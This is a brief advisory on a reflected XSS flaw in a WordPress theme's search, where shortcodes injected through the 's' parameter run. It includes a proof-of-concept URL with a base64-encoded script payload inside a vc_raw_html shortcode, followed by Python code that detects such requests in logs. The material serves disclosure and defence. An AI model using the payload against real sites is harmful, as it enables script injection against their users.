The theme could allow arbitrary shortcodes to be injected when the “Display results from blog” setting is enabled, which could lead to Reflected XSS, for example when a shortcode vulnerable to XSS is used.
When the “Display results from blog” setting is enabled: https://example.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4=[/vc_raw_html][audio%20&post_type=product&product_cat=lighting
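A detection check for this pattern in request logs, added here as an example and not part of the original advisory: it flags search requests whose `s` parameter carries shortcode syntax and decodes any `vc_raw_html` body for triage. The function name, the result fields and the benign sample URL are assumptions; the second sample is the request shown above.

```python
import base64
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Opening or closing shortcode tag, e.g. "[audio" or "[/vc_raw_html".
TAG_RE = re.compile(r"\[/?([A-Za-z][\w-]*)")
# Body of a [vc_raw_html] shortcode (base64 in the request shown in the advisory).
RAW_HTML_RE = re.compile(r"\[vc_raw_html\](.*?)\[/vc_raw_html\]", re.S)


def inspect_search_request(url):
    """Return a finding dict if the `s` parameter contains shortcode tags, else None."""
    query = parse_qs(urlsplit(url).query, keep_blank_values=True)
    for term in query.get("s", []):
        tags = sorted(set(TAG_RE.findall(term)))
        if not tags:
            continue
        decoded = []
        for body in RAW_HTML_RE.findall(term):
            try:
                raw = base64.b64decode(body.strip(), validate=True)
                # Assumption: the decoded body may itself be URL-encoded HTML.
                decoded.append(unquote(raw.decode("utf-8", "replace")))
            except ValueError:
                decoded.append(None)  # not valid base64; keep the slot for triage
        return {
            "term": term,
            "tags": tags,
            # A leading "]" closes whatever shortcode the term was placed into.
            "closes_wrapper": term.lstrip().startswith("]"),
            "decoded_raw_html": decoded,
        }
    return None


# Sample requests: the first is constructed, the second is the one from the advisory.
SAMPLES = [
    "https://example.com/?s=desk+lamp&post_type=product",
    "https://example.com/?s=][vc_raw_html]PHNjcmlwdD5hbGVydChgRmVhclp6WnpgKTs8L3NjcmlwdD4="
    "[/vc_raw_html][audio%20&post_type=product&product_cat=lighting",
]

if __name__ == "__main__":
    for sample in SAMPLES:
        print(inspect_search_request(sample))
```

Legitimate searches that contain bracketed words will also match, so treat a hit as a triage signal and prioritise requests where `closes_wrapper` is true or a decoded body contains markup.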